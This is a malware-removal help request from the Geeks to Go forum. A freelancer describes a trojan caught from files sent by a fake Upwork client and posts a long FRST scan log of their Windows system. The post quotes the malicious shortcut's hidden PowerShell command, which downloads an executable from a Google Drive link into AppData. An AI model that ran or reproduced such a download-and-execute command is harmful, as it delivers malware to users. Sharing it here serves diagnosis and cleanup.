Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

trojan:win32/peals.E!cl


  • This topic is locked This topic is locked

#1
starsknight

starsknight

    Member

  • Member
  • PipPip
  • 30 posts

First off, thank you so, so much for taking the time to help me out.

 

I did something extremely stupid. Lured in by what looked like a valid client interview request on Upwork.com, I accepted some files the supposed client sent over. The first one seemed legit, so I opened the second without thinking, and blam, got a warning from my anti-virus (MSE) that it had blocked trojan:win32/peals.E!cl from my computer.

 

Unfortunately, it didn't block it entirely, because it kept reinstalling on my system. I'd run the anti-virus, the anti-virus would catch it, quarantine it, I'd delete it--but then I'd run another scan and it would come back again; three instances of it.

 

The original file that I stupidly clicked on was a shortcut. Here's where it directed. I've added a space after the https: to avoid this automatically showing as a link, in case anything harmful can still be accessed by clicking it. (I'd doubt that without the complete file name, but I don't want to take chances on spreading this thing.): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https: //drive.google.com/uc?export=download&id=0B5qqPqHdPXcrYV9adlFTSlJlUmM','%APPDATA%\startupp.e

 

(I think the end of that got cut off, and since I've removed that file from my system, I can't tell you what the rest read, except that it was \startupp.exe)

 

I tried running rkill, then removing the files; no luck. They kept reappearing.

 

I was initially unable to update my virus definitions in MSE (the process kept stalling out), but when I attempted it right after (yet again) deleting the evil returning files, I was able to get then updated.

 

As of my latest scan, I get a message pretty fast (even on a quick scan) that reads "Preliminary scan results show that malicious or potentially unwanted software might exist on your system. You can review detected items when the scan has completed." When the scan completes, however, I get nothing. This concerns me, because I did not typically get that message when running scans before this mess started.

 

My system's running a bit slow, but I don't know whether that's due to malware or me straining the computer's resources as I try to get rid of this thing. Initial infection was yesterday at 6:30pm CST or so.
 

Logs are posted below, as requested. Thanks again!

 

********

 

bScan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 02-07-2016
Ran by User1 (administrator) on DAUNTLESS (03-07-2016 12:53:43)
Running from C:\Users\User1\Desktop
Loaded Profiles: User1 (Available Profiles: User1 & DefaultAppPool)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Lenovo.) C:\Windows\System32\ibmpmsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Logitech Inc.) C:\Program Files (x86)\Common Files\logishrd\LVMVFM\UMVPFSrv.exe
(Authentec Inc.) C:\Program Files\ThinkVantage Fingerprint Software\upeksvr.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcPrfMgrSvc.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.30.3\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.30.3\GoogleCrashHandler64.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcDeskBandHlpr.exe
(Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\btwdins.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
(Foxit Software Inc.) C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\CamMute.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TPKNRSVC.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\vcamsvc.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\VIRTSCRL\lvvsst.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\VIRTSCRL\virtscrl.exe
(Intuit) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPHKSVC.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcSvc.exe
(Amazon.com) C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientService.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\micmute.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tphkload.exe
(Vodafone) C:\Program Files (x86)\Vodafone\Vodafone Mobile Broadband\Bin\VmbService.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlkd.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPONSCR.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\shtctky.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TpKnrres.exe
(Lenovo.) C:\Windows\System32\TpShocks.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Password Manager\password_manager.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(hxxp://www.tinydm.com/) C:\Users\User1\AppData\Local\DM\TinyDM.exe
(Amazon.com) C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientSystemTray.exe
(Ricoh co.,Ltd.) C:\Program Files (x86)\Integrated Camera Driver\X64\RCIMGDIR.exe
(Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Dolby Laboratories Inc.) C:\Program Files (x86)\Dolby Home Theater v4\pcee4.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Integrated Clock Controller Service\ICCProxy.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Lenovo Group Limited) C:\Program Files (x86)\ThinkPad\Utilities\SCHTASK.EXE
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\SvcGuiHlpr.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\Brother Help\BrotherHelp.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\Password Manager\pwm_ie_helper_desktop.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\Password Manager\password_manager.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\BTStackServer.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe
(Lenovo) C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Lenovo) C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PrivacyIconClient.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE
(Microsoft Corporation) C:\Windows\splwow64.exe
(Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\Bluetooth Headset Helper.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Apple Inc.) C:\Program Files\iTunes\iTunes.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
(Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\BtITunesPlugIn.exe
(Scrivener HQ Pty Ltd.) C:\Program Files (x86)\Scrivener\Scrivener.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE
() C:\Program Files\Realtek\Audio\HDA\FMAPP.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13776088 2014-12-11] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1391472 2014-12-11] (Realtek Semiconductor)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1337000 2015-04-30] (Microsoft Corporation)
HKLM\...\Run: [LENOVO.TPKNRRES] => C:\Program Files\Lenovo\Communications Utility\TPKNRRES.exe [295712 2014-08-07] (Lenovo Group Limited)
HKLM\...\Run: [AcWin7Hlpr] => C:\Program Files (x86)\Lenovo\Access Connections\AcTBenabler.exe [63728 2015-06-08] (Lenovo)
HKLM\...\Run: [TpShocks] => C:\Windows\system32\TpShocks.exe [384344 2014-02-17] (Lenovo.)
HKLM\...\Run: [PasswordManager] => C:\Program Files\Lenovo\Password Manager\password_manager.exe [1665824 2014-06-23] (Lenovo Group Limited)
HKLM\...\Run: [RtHDVBg_LENOVO_MICPKEY] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1391472 2014-12-11] (Realtek Semiconductor)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176952 2016-05-11] (Apple Inc.)
HKLM-x32\...\Run: [RotateImage] => C:\Program Files (x86)\Integrated Camera Driver\X64\RCIMGDIR.exe [66560 2013-06-17] (Ricoh co.,Ltd.)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292088 2013-07-18] (Intel Corporation)
HKLM-x32\...\Run: [Dolby Home Theater v4] => C:\Program Files (x86)\Dolby Home Theater v4\pcee4.exe [508656 2012-08-31] (Dolby Laboratories Inc.)
HKLM-x32\...\Run: [PWMTRV] => rundll32 "C:\Program Files (x86)\ThinkPad\Utilities\PWMTR64V.DLL",PwrMgrBkGndMonitor
HKLM-x32\...\Run: [IMSS] => C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PIconStartup.exe [134616 2013-12-03] (Intel Corporation)
HKLM-x32\...\Run: [MobileBroadband] => C:\Program Files (x86)\Vodafone\Vodafone Mobile Broadband\Bin\MobileBroadband.exe [408576 2011-04-19] (Vodafone)
HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [139264 2013-04-08] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [4522496 2013-03-22] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [BrHelp] => C:\Program Files (x86)\Brother\Brother Help\BrotherHelp.exe [1944576 2013-03-07] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [Intuit SyncManager] => C:\Program Files (x86)\Common Files\Intuit\Sync\IntuitSyncManager.exe [3792648 2016-02-11] (Intuit Inc. All rights reserved.)
HKLM-x32\...\Run: [FwWordConverter] => C:\Program Files (x86)\RL-Software\FwWordConverter\complete.exe [210944 2016-06-20] (R&L Software)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595992 2016-05-20] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
Winlogon\Notify\psfus: C:\Program Files\ThinkVantage Fingerprint Software\psqlpwd.dll (Authentec Inc.)
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\Run: [Tiny download manager] => C:\Users\User1\AppData\Local\DM\TinyDM.exe [1007384 2015-12-17] (hxxp://www.tinydm.com/)
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [2917456 2016-06-14] (Valve Corporation)
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\MountPoints2: G - G:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\MountPoints2: {3c8896c8-dd30-11e3-88f5-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\MountPoints2: {495a980d-6b8a-11e5-a9ee-f4b7e2e86230} - E:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\MountPoints2: {495a9827-6b8a-11e5-a9ee-f4b7e2e86230} - E:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\MountPoints2: {495a9998-6b8a-11e5-a9ee-f4b7e2e86230} - G:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\MountPoints2: {5adc93e3-8f9d-11e4-bd55-f4b7e2e86230} - D:\KODAK_Camera_Setup_App.exe
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\MountPoints2: {a5031a2d-947b-11e5-9d8a-f4b7e2e86230} - D:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\MountPoints2: {cbbb3579-933d-11e5-a15a-6c881415336c} - F:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\MountPoints2: {d85adddf-4d94-11e5-946b-f4b7e2e86230} - "D:\WD SmartWare.exe" autoplay=true
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\MountPoints2: {ebaca168-8207-11e5-bc08-3c970e8c25d9} - D:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\MountPoints2: {fcdaaf94-6d83-11e5-811c-3c970e8c25d9} - F:\setup_vmb_lite.exe /checkApplicationPresence
Lsa: [Notification Packages] scecli C:\Program Files\ThinkPad\Bluetooth Software\BtwProximityCP.dll C:\Program Files\ThinkVantage Fingerprint Software\psqlpwd.dll
SSODL: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\system32\CbFsMntNtf3.dll (EldoS Corporation)
SSODL-x32: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\SysWOW64\CbFsMntNtf3.dll (EldoS Corporation)
ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll No File
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll No File
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll No File
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll No File
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll No File
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll No File
ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll No File
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll No File
ShellIconOverlayIdentifiers: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\system32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
ShellIconOverlayIdentifiers-x32: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\SysWOW64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Amazon Unbox.lnk [2014-05-30]
ShortcutTarget: Amazon Unbox.lnk -> C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientSystemTray.exe (Amazon.com)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk [2014-05-30]
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Intuit Data Protect.lnk [2016-05-28]
ShortcutTarget: Intuit Data Protect.lnk -> C:\Program Files (x86)\Common Files\Intuit\DataProtect\IntuitDataProtect.exe (Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk [2016-05-28]
ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks_Standard_21.lnk [2016-05-28]
ShortcutTarget: QuickBooks_Standard_21.lnk -> C:\Program Files (x86)\Intuit\QuickBooks 2016\QBW32.EXE (Intuit Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{00F12050-C1AB-420D-93CB-FDF14345310D}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{043BE712-F8BC-4377-96FB-45DB49ECFB1D}: [NameServer] 197.250.65.178 41.223.5.33
Tcpip\..\Interfaces\{043BE712-F8BC-4377-96FB-45DB49ECFB1D}: [DhcpNameServer] 197.250.65.178 41.223.5.33
Tcpip\..\Interfaces\{29476DF9-6B52-48BF-9ABE-9D23CBBCCBDA}: [NameServer] 197.250.65.178 41.223.5.33
Tcpip\..\Interfaces\{36EED24D-C991-404A-9A7B-1353998A1249}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{5F842A87-F1DD-44FE-99AE-8492F10299AD}: [NameServer] 197.250.65.178 41.223.5.33

Internet Explorer:
==================
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\ssv.dll [2016-06-26] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\jp2ssv.dll [2016-06-26] (Oracle Corporation)
Handler-x32: intu-help-qb9 - {C1252096-0E63-4C06-A38B-03DF9A16AA12} - C:\Program Files (x86)\Intuit\QuickBooks 2016\HelpAsyncPluggableProtocol.dll [2016-02-11] (Intuit, Inc.)
Handler-x32: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\Windows\system32\mscoree.dll [2010-11-20] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\User1\AppData\Roaming\Mozilla\Firefox\Profiles\7nkpvw3l.default-1437326176257
FF DefaultSearchEngine.US: Google
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_22_0_0_192.dll [2016-06-17] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_22_0_0_192.dll [2016-06-17] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-12-18] ()
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-03] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-03] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.91.2 -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\dtplugin\npDeployJava1.dll [2016-06-26] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.91.2 -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\plugin2\npjp2.dll [2016-06-26] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-10] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-10] (Google Inc.)
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\wtu-secure-search.xml [2014-05-29]
FF Extension: Adblock Plus - C:\Users\User1\AppData\Roaming\Mozilla\Firefox\Profiles\7nkpvw3l.default-1437326176257\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-04-29]
FF HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\Firefox\Extensions: [{F74D5734-46F5-4B16-96F0-1E7FBF41B750}] - C:\Program Files (x86)\Lenovo\Password Manager\PWM Firefox Extension\2.0b12
FF Extension: ThinkVantage Password Manager - C:\Program Files (x86)\Lenovo\Password Manager\PWM Firefox Extension\2.0b12 [2014-07-21] [not signed]

Chrome:
=======
CHR Profile: C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-06-05]
CHR Extension: (Google Drive) - C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-19]
CHR Extension: (ColorZilla) - C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Extensions\bhlhnicpbhignbdhedgjhgdocnmhomnp [2015-08-17]
CHR Extension: (YouTube) - C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-19]
CHR Extension: (Google Search) - C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-19]
CHR Extension: (Google Docs Offline) - C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-04-10]
CHR Extension: (Boomerang for Gmail) - C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdanidgdpmkimeiiojknlnekblgmpdll [2016-04-08]
CHR Extension: (Chrome Web Store Payments) - C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-05-22]
CHR Extension: (Gmail) - C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-05]
CHR HKLM-x32\...\Chrome\Extension: [lpdfbkehegfmedglgemnhbnpmfmioggj] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ADVService; C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientService.exe [23040 2015-02-22] (Amazon.com) [File not signed]
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-03-02] (Apple Inc.)
S3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [282112 2012-10-26] (Brother Industries, Ltd.) [File not signed]
S3 DozeSvc; C:\Program Files (x86)\ThinkPad\Utilities\DZSVC64.EXE [326160 2016-04-14] (Lenovo.)
R2 FoxitCloudUpdateService; C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe [244392 2015-03-13] (Foxit Software Inc.)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-12-03] (Intel Corporation)
R2 LENOVO.TVTVCAM; C:\Program Files\Lenovo\Communications Utility\vcamsvc.exe [197408 2014-08-07] (Lenovo Group Limited)
R2 Lenovo.VIRTSCRLSVC; C:\Program Files\LENOVO\VIRTSCRL\lvvsst.exe [115184 2014-07-08] (Lenovo Group Limited)
S3 LSC.Services.SystemService; C:\Program Files\Lenovo\Lenovo Solution Center\App\LSC.Services.SystemService.exe [273232 2016-04-20] (Lenovo)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation)
